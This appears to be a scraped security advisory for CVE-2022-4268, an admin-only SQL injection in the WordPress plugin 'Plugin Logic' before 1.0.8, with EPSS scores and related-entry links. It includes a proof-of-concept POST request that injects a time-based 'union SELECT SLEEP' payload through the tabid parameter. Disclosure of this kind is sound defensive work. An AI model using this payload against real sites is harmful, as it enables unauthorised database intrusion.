Lucene search
Kunal SharmaWPVDB-ID:BDE93D90-1178-4D55-AEA9-E02C4F8BCAA2HistoryDec 02, 2022 - 12:00 a.m.
Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-0200:00:00
Kunal Sharma
wpscan.com
5
sql injection
admin privilege
exploitable vulnerability
parameter sanitization
EPSS
0.001
Percentile
43.3%
The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
PoC
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid;=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 123 Cookie: [admin+] plulo_checklist%5B0%5D=0&plulo;_checklist%5B0%5D=1&plulo;_radiolist%5B0%5D=0&plulo;_txt_list%5B0%5D=&plulo;_submit=Save+Changes
Related
cvelist
cvelist
CVE-2022-4268 Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-26 12:27:56
wpexploit
wpexploit
Plugin Logic < 1.0.8 - Admin+ SQLi
2022-12-02 00:00:00
cve
cve
CVE-2022-4268
2022-12-26 13:15:14
prion
prion
Sql injection
2022-12-26 13:15:00
nvd
nvd
CVE-2022-4268
2022-12-26 13:15:14